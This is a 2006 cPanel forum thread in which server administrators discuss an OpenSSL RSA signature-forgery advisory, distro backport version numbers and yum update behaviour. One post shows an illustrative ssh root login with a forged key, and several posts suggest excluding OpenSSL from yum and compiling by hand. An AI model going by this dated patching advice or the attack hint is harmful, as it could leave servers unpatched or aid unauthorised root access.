The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

OpenSSL Security Advisory [5th September 2006]

Discussion in 'Security' started by Domenico, Sep 8, 2006.

  1. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    #1 Domenico, Sep 8, 2006
    Last edited: Sep 8, 2006
  2. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    This is just simply uncomprehendable, even after updating OpenSSL to the latest version (manually compiling) cPanel still tries to undo the changes. Look what happens when I recompile apache:

    ---

    Warning !! openssl-devel has been modified... reinstalling....Setting up Install Process
    Setting up repositories
    Reading repository metadata in from local files
    Excluding Packages in global exclude list
    Finished
    Parsing package install arguments
    Resolving Dependencies
    --> Populating transaction set with selected packages. Please wait.
    ---> Package openssl-devel.i586 0:0.9.7a-43.10 set to be updated
    --> Running transaction check

    Dependencies Resolved

    =============================================================================
    Package Arch Version Repository Size
    =============================================================================
    Installing:
    openssl-devel i586 0.9.7a-43.10 base 1.6 M

    ---

    What the **** is this? What kind of repo is CentOS using here...? The 2003 openssl version came straight out of Redhat 9, so this is just great.
     
  3. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Well I'm able to skip the openssl updating process by adding it to the exclude list in /etc/yum.conf, but still, it's rediculous that everybody is still using some ancient version by default...
     
  4. forlinuxsupport

    forlinuxsupport Well-Known Member
    PartnerNOC

    Joined:
    Dec 22, 2004
    Messages:
    386
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    submit it as bug request to cpanel so they can update theirs :)
     
  5. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    Really, you can login as root to someones box easily so cPanel guys, please fix asap.
     
  6. Bdzzld

    Bdzzld Well-Known Member

    Joined:
    Apr 3, 2004
    Messages:
    356
    Likes Received:
    1
    Trophy Points:
    18
    Hi Domenico,

    I've read about this subject too on the Dutch WHT (I've another nick there).
    Have you personally tried to "hack" into your own cPanel server without using a root password ? I believe cPanel is using an altered version of OpenSSL.

    Regards.
     
  7. driverC

    driverC Well-Known Member

    Joined:
    Jul 23, 2004
    Messages:
    112
    Likes Received:
    0
    Trophy Points:
    16
    On Red Hat distributions like Fedora, CentOS or Red Hat Enterprise the OpenSSL version number is not correct. That is because Red Hat is using a custom version of OpenSSL. Eventhough it appears to be old and insecure it is a new and safe version. If you update it manually you will **** things up and you may break dependencies. Red Hat doesn`t like custom versions of OpenSSL at all. For example after I did update OpenSSL manually attampts to update Apache failed completely. I had to copy the openssl file from another Red Hat server and add it to the new server. So I think/hope you can forget about OpenSSL not beeing safe. It is just because Red Hat distributions are using their own version of OpenSSL with an incorrent old version number as far as I understand it.
     
    #7 driverC, Sep 8, 2006
    Last edited: Sep 8, 2006
  8. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    I don't think this has anything to with CPanel, openssl is updated by the OS.

    I tried to update openssl with yum to openssl-0.9.7a-43.11 (the latest version it seems) on CentOS 4.3 and 4.4, but it says it has nothing to update.
     
  9. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    We know this has nothing to do with cPanel but all of our cPanel boxes have the same 'old' version;

    openssl version
    OpenSSL 0.9.7a Feb 19 2003

    Upgrading to the latest version has no use since the daily cPanel update proces puts the old version back.

    Can someone from the cPanel team please react? Nick?
     
  10. rachweb

    rachweb Well-Known Member

    Joined:
    Jun 26, 2004
    Messages:
    268
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    amsterdam

    The best way is to open a support ticket.
     
  11. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Why using 'openssl version' to determine your version is pointless has already been pointed out in this thread by driverC

    You could try this to see which version you have installed:

    Code:
    root@host [~]# rpm -qa openssl
    openssl-0.9.7a-43.10
    
    You can check for which platforms CentOS has released openssl-0.9.7a-43.11 here:
    http://lists.centos.org/pipermail/centos-announce/2006-September/thread.html
     
  12. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Open /etc/yum.conf and add "OpenSSL*" to the exclude list. Then manually compile the new openssl version and you're good to go.
     
  13. eXite

    eXite Well-Known Member

    Joined:
    May 16, 2003
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    DataCenter Provider
    Wel nothing is corrupted here:

    # openssl version
    OpenSSL 0.9.8c 05 Sep 2006

    # rpm -qa | grep openssl
    openssl-0.9.7a-43.10

    43.10, what the hell is that supposed to mean. How am I supposed to know how the patchlevel reflects vulnerability?
     
  14. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    By reading the release info maybe and looking at the release date? I gave you a link to the centos archive, all the info you need is there. Ofcourse if you prefer to manually compile and update all your software then you're free to do so...
     
  15. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    You want my ip so you can show me how it's done? :rolleyes:
     
  16. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    ~$ ssh root@yourdoman/ip -p22 -i id_dsa_badcert

    If you want to know more just look at the right places or ask these guys on webhostingtalk.nl -> http://www.webhostingtalk.nl/direct...ico-openssl.html?highlight=openssl#post760972

    Anyways, I know how to update but the trick is doing it without breaking a cPanel box and that is something you just don't know for sure. :eek:
     
  17. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    That's your theory, I asked you to come and prove it. :D

    Have you done it, or have you seen it done?

    (Even if your imaginary attack worked, that line won't work against my servers anyway . . . :) )

    I note yum has already updated OpenSSL on my CentOS 3 boxes, but not the CentOS 4 ones yet.

    I don't see how cPanel has anything to do with the issue, you should be hitting the forums of your OS supplier.
     
  18. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    This is a known exploit that is mentioned on the OpenSSL website:

    I sent out to my customers, should work for you too in RHEL/CentOS Env:
    I believe that will protect against the exploit and keep it from reverting back to the older version...
     
  19. teakwood

    teakwood Active Member

    Joined:
    Jul 8, 2006
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Sydney
    Can anyone tell me exactly how this bug can be used to attack a server?

    Don't tell me what you've read. Don't tell me what your guess is. Tell me something you know.
     
  20. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    Lol, "don't tell me what you've read"? I think most people have only read about this and haven't seen it used or tried to break in to a system using it. What's the hostility about with this issue? ;)

    Openssl patched things because they were shown how a spoofed RSA gave someone root access to a server that was running the old version. Of course if you still use a root login to access your server then you should be perfectly fine. But if you're using Identity/Pubkey access it's disasterous. It means anyone using a spoofed key can access your server. My understanding is that it only works with keys with exponents of 3. But why bother taking a chance when you can upgrade without much trouble and avoid what might be a bad situation?

    Anyway, people are right that this has nothing to do with cPanel other then the fact that on nightly update the /scripts/sysup run will probably overwrite your custom compile of the latest version with the patched version provided by your OS repos.
     
Loading...

Share This Page